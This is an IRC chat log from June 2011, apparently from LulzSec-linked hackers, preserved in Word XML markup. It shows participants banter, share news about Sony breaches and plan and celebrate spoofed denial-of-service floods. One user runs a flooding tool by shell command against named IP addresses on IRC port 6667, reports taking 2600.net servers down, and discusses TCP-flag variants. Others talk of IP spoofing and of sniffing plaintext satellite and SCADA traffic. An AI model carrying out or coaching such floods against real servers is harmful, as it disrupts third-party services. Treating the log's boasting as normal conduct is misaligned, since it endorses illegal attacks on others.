        <w:t>Jun 03 14:46:13 joepie91 retweet that Jun 03 14:46:17 joepie91 http://twitter.com/#!/Jake_W/status/76718192852090880 Jun 03 14:46:19 Topiary k Jun 03 14:46:22 joepie91 :P Jun 03 14:46:48 storm hi Jun 03 14:47:37 lol omg &lt;3 this Jun 03 14:47:37 lol http://techliberation.com/wp- content/uploads/2011/06/poptartFINALTINY.gif Jun 03 14:48:26 * joepie91 save Jun 03 14:52:34 storm i just woke up again Jun 03 14:52:37 storm &gt;:x Jun 03 14:52:40 joepie91 morning xD Jun 03 14:52:45 storm thanks Jun 03 14:54:42 trollpoll lulzsec.... the reign where the sun never set... Jun 03 14:56:51 joepie91 jesus christ Jun 03 14:56:54 joepie91 all bitcoin sites are slow Jun 03 14:56:54 joepie91 atm Jun 03 15:01:45 storm -:- Channel #lulzsec was created at Fri Jun 3 02:59:10 2011 Jun 03 15:01:45 storm -:- BitchX: Join to #lulzsec was synched in 0.204 secs!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:01:45 storm -:- r0d3nt No such server Jun 03 15:01:45 storm -:- BitchX: Generating irc server map Jun 03 15:01:45 storm -:- madjack.2600.net [0] Jun 03 15:01:54 storm lmfao Jun 03 15:02:05 storm -:- Topic (#2600): 2600 | Get your faux on Jun 03 15:02:05 storm -:- Topic (#2600): set by jax!~jax@184.107.140.210 at Thu Jun 2 23:34:40 2011 Jun 03 15:02:05 storm -:- [Users(#2600:11)] Jun 03 15:02:05 storm [ hatred ] [ _kb ] [vpsypete ] [vAngryNerdA] [vschrodinge] Jun 03 15:02:05 storm [vmaxim ] [vkutio ] [vdizopsin ] [vElectRo' ] [vz0t ] Jun 03 15:02:05 storm [vbinary_ ] Jun 03 15:02:17 storm sorry guis Jun 03 15:02:21 storm did i sink your ship?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:03:12 lol lol Jun 03 15:03:24 storm hey kayla Jun 03 15:03:50 * storm hits ism electronic cigarette Jun 03 15:03:55 storm his even Jun 03 15:03:56 storm :D Jun 03 15:04:39 trollpoll @2600 The next "reporter" who calls us asking to speak to someone from @LulzSec is going to lose their phone privileges. We're serial Jun 03 15:04:42 lol hihihihihihhi \:D/ Jun 03 15:04:43 trollpoll hilarious xDDD Jun 03 15:05:11 storm troll Jun 03 15:05:16 storm i posted that last night Jun 03 15:05:18 storm it is lulz Jun 03 15:05:32 storm \o/ Jun 03 15:05:41 storm HACK US AND WE WILL BOMB YOU. - Obama Jun 03 15:05:48 trollpoll didnt see :P nice lulz ye Jun 03 15:05:54 trollpoll yes, this is not so lulz... :P Jun 03 15:06:03 storm lol Jun 03 15:06:05 trollpoll and the NATO doc too...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:06:12 storm i didnt see it Jun 03 15:06:28 trollpoll NATO document talking about anonymous Jun 03 15:06:29 * storm gives channel operator status to Topiary Jun 03 15:06:35 storm oh Jun 03 15:06:36 trollpoll that must be prosecuted Jun 03 15:06:43 storm yeah i saw that Jun 03 15:06:58 trollpoll one of these days we will have tanks on our homes...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:07:19 storm yeah no shit Jun 03 15:07:28 trollpoll http://www.nato-pa.int/default.asp?SHORTCUT=2443 Jun 03 15:07:28 storm scary stuff Jun 03 15:07:31 trollpoll this is the report...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:07:45 trollpoll that =XXXX make me tent....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:08:19 storm i need to somehow get more spoofing boxes Jun 03 15:08:27 storm i have a few networks listed that allow it Jun 03 15:09:09 trollpoll i now a "complicated" technology to spoof and make totally imposible to track Jun 03 15:09:23 trollpoll is satellite based...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:09:36 trollpoll did you heard about?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:09:41 storm well Jun 03 15:09:49 storm i dont know of anything untrackable Jun 03 15:09:50 trollpoll ill try to found a doc about it Jun 03 15:09:58 storm even my spoofed attacks are trackable Jun 03 15:10:02 storm if you have backbone access Jun 03 15:10:10 storm only if Jun 03 15:10:13 trollpoll yes, with a satellite the unique trackable will be that you are in europe Jun 03 15:10:18 trollpoll or in usa xD Jun 03 15:10:26 storm heh Jun 03 15:10:27 trollpoll because the satellite sends the signal to everybody Jun 03 15:10:32 trollpoll so many ppl can hear Jun 03 15:10:51 trollpoll the only way to track is in the "send" signal Jun 03 15:11:15 trollpoll but not in the receive, so, if you spoof your ip address to an ip address that you know that is used by satellite Jun 03 15:11:33 trollpoll you can send for one way and receive for another Jun 03 15:11:52 trollpoll you just need an isp that permit spoofing Jun 03 15:11:52 storm i usually just use random ip spoofing Jun 03 15:12:07 storm which is flag 0 for my program Jun 03 15:12:22 storm meaning it sends numerous source ips Jun 03 15:12:28 storm more than 400 id say Jun 03 15:12:47 joepie91 botflood in #lulzsec Jun 03 15:12:51 trollpoll cool Jun 03 15:13:20 storm on 2600?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:13:41 storm nvm Jun 03 15:14:08 Recursion MAN Jun 03 15:14:15 Recursion -caps Jun 03 15:14:36 Recursion map, I have more karma on my throwaway account than I do on my regular reddit account Jun 03 15:14:40 Recursion man* Jun 03 15:15:32 joepie91 lol Jun 03 15:16:35 trollpoll btw the 90% of the satellite traffic is plain text...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:16:50 trollpoll and is it possible to sniff whatever you want... Jun 03 15:16:59 trollpoll scada traffic ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:17:20 tflow http://lulzsecurity.com/ sailing smoothly again Jun 03 15:19:02 Topiary you think it'll hold captain?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:19:13 tflow yes Jun 03 15:19:58 tflow for sure Jun 03 15:21:13 storm doesnt look smooth to me tflow Jun 03 15:21:20 tflow howso Jun 03 15:22:47 trollpoll anyway, if you want to know more about it... http://www.blackhat.com/presentations/bh-dc-10/Nve_Leonardo/BlackHat-DC- 2010-Nve-Playing-with-SAT-1.2-wp.pdf Jun 03 15:23:29 sabu yes Jun 03 15:23:32 sabu we need to look at Jun 03 15:23:51 storm Sabu :D Jun 03 15:23:56 sabu yes brother Jun 03 15:24:00 storm howyu be Jun 03 15:24:23 storm im learning nmap &gt;;x Jun 03 15:24:24 storm er Jun 03 15:24:26 storm nmap?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:24:26 storm no Jun 03 15:24:30 storm msf3 Jun 03 15:24:51 storm METASPLOIT NINJA'IN Jun 03 15:25:02 sabu word up Jun 03 15:27:41 joepie91 if you want to know what laws you are breaking Jun 03 15:27:42 joepie91 http://mpictcenter.blogspot.com/2011/06/legal- issues-in-pbs-hack.html Jun 03 15:27:48 joepie91 :P Jun 03 15:28:00 sabu sweet Jun 03 15:28:02 joepie91 aaaand gone was anonworld Jun 03 15:28:05 joepie91 &gt;.&lt; Jun 03 15:28:08 trollpoll "LulzSec, a splinter group of Anomous," Jun 03 15:28:11 trollpoll bad starting...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:28:12 joepie91 lolya Jun 03 15:28:17 joepie91 the rest is a copypaste Jun 03 15:28:22 joepie91 from a legalfag email Jun 03 15:31:01 storm LULzsec Jun 03 15:31:03 storm lmao Jun 03 15:32:40 lol lulzsex Jun 03 15:32:55 lol lulzseckz Jun 03 15:35:08 storm lol Jun 03 15:42:43 joepie91 there are so many spinoffs on twitter Jun 03 15:42:45 joepie91 and parodies Jun 03 15:42:46 joepie91 and fans Jun 03 15:42:47 joepie91 etc Jun 03 15:44:01 tflow it's a meme :o Jun 03 15:44:16 tflow server# netstat -n | wc -l Jun 03 15:44:16 tflow 394 Jun 03 15:44:21 tflow site is handling a fuckton of visitors Jun 03 15:44:27 tflow all those are legitimate connections btw Jun 03 15:44:42 joepie91 lol Jun 03 15:44:47 joepie91 do you have an access log?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:45:38 joepie91 also, why does the site not have the bitcoin address on it Jun 03 15:45:39 joepie91 :| Jun 03 15:46:26 tflow yeah i have an access log Jun 03 15:46:32 tflow i'll add bitcoin address soon Jun 03 15:46:38 tflow too busy with #fuckfbifriday atm Jun 03 15:46:54 storm tflow Jun 03 15:47:02 storm you backdoor that shit already?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:47:20 tflow backdoor what Jun 03 15:47:37 tflow :P Jun 03 15:47:38 storm i thought that was a server you owned Jun 03 15:47:39 storm xD Jun 03 15:47:57 tflow oh Jun 03 15:47:59 tflow no lol Jun 03 15:48:04 tflow that's our lulzsecurity.com server Jun 03 15:48:07 joepie91 tflow, cat access.log | grep wc -l Jun 03 15:48:10 joepie91 er Jun 03 15:48:11 storm ah Jun 03 15:48:16 joepie91 cat access.log | wc -l Jun 03 15:48:18 joepie91 lefail Jun 03 15:48:48 tflow 12668 Jun 03 15:50:16 joepie91 mmm, not bad Jun 03 15:50:28 joepie91 but cloudflare would probably be moar accurate Jun 03 15:50:33 tflow yeah Jun 03 15:50:36 tflow that's in like 10 mins Jun 03 15:53:05 joepie91 what is?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:53:18 tflow how long the site has been up on the next serv Jun 03 15:53:21 tflow new* Jun 03 15:54:25 storm i havent been able to load the site Jun 03 15:54:26 storm at all Jun 03 15:54:34 joepie91 people really do love lulzsec Jun 03 15:54:35 joepie91 "I can only hope they are charged with Treason. That can still get you the death penelty, if I'm not mistaken." Jun 03 15:55:01 sabu true Jun 03 15:55:02 joepie91 btw, tflow, might want to turn down cloudflare protection level to essentially off Jun 03 15:55:05 sabu treason for what exacty Jun 03 15:55:06 sabu ahah Jun 03 15:55:08 joepie91 idk?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:55:29 tflow yeah i did joepie91 Jun 03 15:55:37 joepie91 ok Jun 03 15:55:37 joepie91 also Jun 03 15:55:38 joepie91 Seven a.m., waking up in the morning, Jun 03 15:55:38 joepie91 Gotta get ready, gotta head downstairs Jun 03 15:55:38 joepie91 Gotta have my hacks, gotta have my snacks Jun 03 15:55:38 joepie91 Seein' everything , the time is goin' Jun 03 15:55:38 joepie91 Tickin' on and on, every's hackin' Jun 03 15:55:38 joepie91 Gotta get into the database Jun 03 15:55:38 joepie91 I hear a smash, I see the feds Jun 03 15:55:38 joepie91 Kickin' down the front door Jun 03 15:55:38 joepie91 Smashin' in the back door Jun 03 15:55:38 joepie91 Gotta make my mind up, Jun 03 15:55:39 joepie91 How can I escape?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:55:40 joepie91 It's Friday, Friday Jun 03 15:55:41 joepie91 It's Fuck FBI Friday Jun 03 15:55:42 joepie91 Everybody's lookin' forward to the hackin', hackin' Jun 03 15:55:43 joepie91 Friday, Friday Jun 03 15:55:44 joepie91 Hackin' it on Friday Jun 03 15:55:45 joepie91 Everybody's lookin' forward to the break in Jun 03 15:55:50 Topiary any flood attempts so far tflow?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:55:50 tflow lol nice Jun 03 15:55:53 tflow Topiary, Jun 03 15:55:54 tflow Topiary, nope Jun 03 15:56:01 tflow any flood attempts will be killed by cloudflare Jun 03 15:56:09 tflow plus the site is running on a dedi Jun 03 15:56:14 tflow so it should be all good Jun 03 15:56:23 Topiary that's awesome joepie Jun 03 15:56:26 Topiary did you write that?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:56:36 joepie91 noes Jun 03 15:56:38 Topiary also hackin' = leakend Jun 03 15:56:40 joepie91 http://www.escapistmagazine.com/forums/read/18.288904-Hacking-Group-LulzSec- gears-up-for-Fuck-FBI-Friday?page=2 Jun 03 15:56:43 Topiary must change to leakend Jun 03 15:56:52 joepie91 tflow: http floods get through sometimes Jun 03 15:56:57 joepie91 it takes cloudflare 1 or 2 days Jun 03 15:56:59 joepie91 to detect the, Jun 03 15:57:00 joepie91 them* Jun 03 15:57:02 joepie91 and block them Jun 03 15:57:03 joepie91 &gt;.&gt; Jun 03 15:57:09 sabu yea but im a superb admin Jun 03 15:57:14 joepie91 then again, a http flood won't do much if you are running lighttpd/nginx Jun 03 15:57:15 sabu I'll deter the attacks Jun 03 15:57:28 storm Sabu Jun 03 15:57:31 sabu hi Jun 03 15:57:41 storm you should setup the ircd server to block incoming udp attacks Jun 03 15:57:46 storm since irc doesnt need udp at all Jun 03 15:57:51 joepie91 also, it seems Cloudflare is happy with their new customers in anon, lulzsec, etc Jun 03 15:57:51 joepie91 :P Jun 03 15:59:00 storm lol Jun 03 15:59:01 Topiary CloudFlare CEO = our homeboy Jun 03 15:59:05 Topiary BitCoin owner = our homeboy Jun 03 15:59:08 Topiary Pastebin owner = our homeboy Jun 03 15:59:13 Topiary Mediafire owner = faggot Jun 03 15:59:23 storm lets pwn mediafire Jun 03 15:59:29 storm they sux anyway Jun 03 15:59:48 joepie91 lol Jun 03 15:59:51 joepie91 mediafire removed it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:59:51 joepie91 aldo Jun 03 15:59:52 joepie91 also* Jun 03 15:59:54 joepie91 "bitcoin owner" Jun 03 15:59:55 joepie91 no exist Jun 03 15:59:59 Topiary on what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:00:20 Topiary oh right Jun 03 16:00:33 tflow just @bitcoinmedia Jun 03 16:00:36 joepie91 there is no central owner, remember? :P Jun 03 16:07:49 joepie91 google news frontpage: http://arstechnica.com/tech- policy/news/2011/06/lulz-sony-hackers-deny-responsibility-for-misuse-of- leaked-data.ars Jun 03 16:08:22 tflow awesome image Jun 03 16:08:26 lol lol at tht pic xD Jun 03 16:08:52 lol thts awesome xD Jun 03 16:09:05 joepie91 lol ye Jun 03 16:09:10 joepie91 ars has been posting some great pics Jun 03 16:09:12 joepie91 idk who makes them Jun 03 16:09:13 joepie91 but they are epic Jun 03 16:11:11 storm glad i dont have a ps3 Jun 03 16:13:17 joepie91 Be proactive about following security best practices and data security compliance requirements. Don't be a Sony. Jun 03 16:13:20 joepie91 lol'd Jun 03 16:13:29 joepie91 do I smell a new meme?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:13:33 joepie91 "Don't be a Sony" Jun 03 16:13:37 joepie91 http://www.pcworld.com/businesscenter/article/229351/sony_hacked_again_how_not_to_do_network_security.html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16:13:39 Topiary Sony I am disappoint Jun 03 16:13:56 Topiary Pony Slaystation!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:14:03 joepie91 lol Jun 03 16:14:49 Topiary is anyone still on 2600?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:14:52 Topiary if so: disperse Jun 03 16:14:54 Topiary fuck that shithole Jun 03 16:15:00 Topiary in our channel anyway Jun 03 16:17:03 trollpoll i think (hope) nobody is still there Jun 03 16:18:19 joepie91 also Jun 03 16:18:19 joepie91 http://www.spiegel.de/netzwelt/web/0,1518,766167,00.html Jun 03 16:18:23 joepie91 and well, the channel died out a bit Jun 03 16:18:25 joepie91 after the botflood Jun 03 16:19:08 Topiary I hope none of us are still there Jun 03 16:20:19 storm Topiary I agree ;p Jun 03 16:20:25 storm their server got owned Jun 03 16:20:28 storm after we left Jun 03 16:20:45 storm collective was gone as well as every single server i knew of Jun 03 16:20:45 storm ;x Jun 03 16:22:13 * joepie91 is still logged on Jun 03 16:22:34 storm do /map Jun 03 16:22:41 storm all of the servers are gone Jun 03 16:22:42 storm lols Jun 03 16:22:54 Topiary yeah none of us should be in #lulzsec Jun 03 16:23:06 Topiary we decided to ditch such a filthy room :x Jun 03 16:23:08 joepie91 - collective.2600.net ----------------------------- - | Users: 359 (56.2%) Jun 03 16:23:08 joepie91 - '- blackbeard.2600.net -------------------------- | Users: 0 (0.0%) Jun 03 16:23:08 joepie91 - |- djslocker.2600.net ----------------------- | Users: 92 (14.4%) Jun 03 16:23:08 joepie91 - |- bartholomew.2600.net --------------------- | Users: 179 (28.0%) Jun 03 16:23:08 joepie91 - '- services.2600.net ------------------------ | Users: 9 (1.4%) Jun 03 16:23:08 joepie91 - End of /MAP Jun 03 16:23:10 lol you've killed all their server xD?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:23:14 storm no Jun 03 16:23:18 storm oh i see Jun 03 16:23:22 storm madjack isnt linked Jun 03 16:23:25 storm weird Jun 03 16:23:33 storm i killed their servers hard last night Jun 03 16:23:43 storm forgot about it running for like 20 mins just ganking Jun 03 16:23:48 lol hit collective it has most users xD Jun 03 16:23:52 storm lolol Jun 03 16:23:54 storm sure thing Jun 03 16:23:56 storm 1 sec Jun 03 16:25:50 storm root@YNService(~/.local)]#./nsdapx 208.111.35.75 202.103.67.101 6667 0 20 0 Jun 03 16:25:51 storm Sending packets of size 40....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:26:05 storm Sending packets of size 40....x 208.111.35.75 218.108.235.101 6667 0 20 0 Jun 03 16:26:07 storm lolz Jun 03 16:26:36 storm i should hit them with tons of spoofage Jun 03 16:26:37 storm from Jun 03 16:26:40 storm 101.101.101.101 Jun 03 16:26:43 storm lolololol Jun 03 16:27:09 Topiary they're gonna be so fucking angry Jun 03 16:28:48 joepie91 - Closing Link: s514735fe.adsl.wanadoo.nl (Ping timeout: 240 seconds) Jun 03 16:28:48 joepie91 ~ Connection closed Jun 03 16:28:49 joepie91 interesting Jun 03 16:30:20 storm lol its their fault Jun 03 16:30:29 storm for being fucktwits Jun 03 16:35:06 * pwnsauce (pwnsauce@HA-4fq.4hj.tbgr2g.IP) has joined #pure- elite Jun 03 16:35:11 storm pwnsauce :D Jun 03 16:35:15 pwnsauce hey!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:35:19 pwnsauce im a bit fucked Jun 03 16:35:19 storm sup cutie Jun 03 16:35:22 pwnsauce not much Jun 03 16:35:39 storm HACK US, AND WE WILL BOMB YOU Jun 03 16:35:48 lol This is the second time hackers have targeted Sony's computer network - in April they stole data from more than 100 million accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:35:49 lol only second?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:36:00 lol im sure the score is at like HACKERS 13 SONY 0 Jun 03 16:36:14 pwnsauce LOL Jun 03 16:36:18 pwnsauce we winrar Jun 03 16:36:24 pwnsauce Kayla &lt;3 Jun 03 16:38:35 storm 16:38 -!- djslocker.2600.net ------------------------- ------ | Users: 145 Jun 03 16:38:48 storm (34.6%) Jun 03 16:38:48 storm 16:38 -!- '- blackbeard.2600.net --------------------- ----- | Users: 0 Jun 03 16:38:48 storm (0.0%) Jun 03 16:38:48 storm 16:38 -!- |- bartholomew.2600.net -------------------- - | Users: 265 Jun 03 16:38:48 storm (63.2%) Jun 03 16:38:48 storm 16:38 -!- '- services.2600.net ----------------------- - | Users: 9 Jun 03 16:38:48 storm (2.1%) Jun 03 16:38:48 storm collective is gone Jun 03 16:38:50 Topiary &gt;bartholomew Jun 03 16:38:53 Topiary hello newcomer Jun 03 16:38:59 Topiary shall we pop its DDoS cherry?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:39:12 storm i hit it last night Jun 03 16:39:14 storm but yeah Jun 03 16:39:15 storm :P Jun 03 16:40:46 pwnsauce hehehehe Jun 03 16:40:56 pwnsauce SYN storm ahead me bretheren Jun 03 16:41:16 storm lol Jun 03 16:41:18 storm not SYN Jun 03 16:41:20 storm urg Jun 03 16:41:21 storm !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:41:22 storm &lt;# Jun 03 16:41:24 storm &lt;3* Jun 03 16:41:27 storm urgent ftw Jun 03 16:41:35 pwnsauce AAAH Jun 03 16:41:37 pwnsauce :D Jun 03 16:41:43 storm their servers are like URGENT MESSAGE FROM LULZSEC Jun 03 16:41:44 storm drop Jun 03 16:41:45 storm drop Jun 03 16:41:45 storm drop Jun 03 16:41:51 pwnsauce try PSH also Jun 03 16:41:52 joepie91 guys Jun 03 16:41:53 joepie91 http://www.wired.com/threatlevel/2011/06/internet- a-human-right Jun 03 16:41:58 storm yeah i use push a lot Jun 03 16:42:00 pwnsauce Internet IS a right!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:42:04 joepie91 A United Nations report said Friday that disconnecting people from the internet is a human rights violation and against international law.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:42:07 pwnsauce brb need food Jun 03 16:42:07 storm i can hit with any tcp flag Jun 03 16:42:08 storm ;p Jun 03 16:42:10 pwnsauce :D Jun 03 16:45:28 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 16:45:53 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 16:50:56 storm 16:50 -!- collective.2600.net ------------------------ ------ | Users: 190 Jun 03 16:50:56 storm (44.8%) Jun 03 16:50:56 storm 16:50 -!- '- blackbeard.2600.net --------------------- ----- | Users: 0 Jun 03 16:50:56 storm (0.0%) Jun 03 16:50:56 storm 16:50 -!- |- djslocker.2600.net ---------------------- - | Users: 225 Jun 03 16:50:56 storm (53.1%) Jun 03 16:50:56 storm 16:50 -!- '- services.2600.net ----------------------- - | Users: 9 Jun 03 16:50:56 storm (2.1%) Jun 03 16:50:59 storm gone Jun 03 16:51:37 Topiary amazing Jun 03 16:51:40 Topiary fucking 2600 Jun 03 16:52:05 Topiary you're like our resident sniper sitting in the crow's nest with a goddamn deck-shattering electricity blast Jun 03 16:52:25 Topiary enemy ships being riddled with holes Jun 03 16:52:26 storm RPF: Jun 03 16:52:27 storm ROFL Jun 03 16:52:35 storm wow Jun 03 16:52:38 storm you're epic Jun 03 16:52:47 joepie91 lol Jun 03 16:52:49 joepie91 Topirya Jun 03 16:52:52 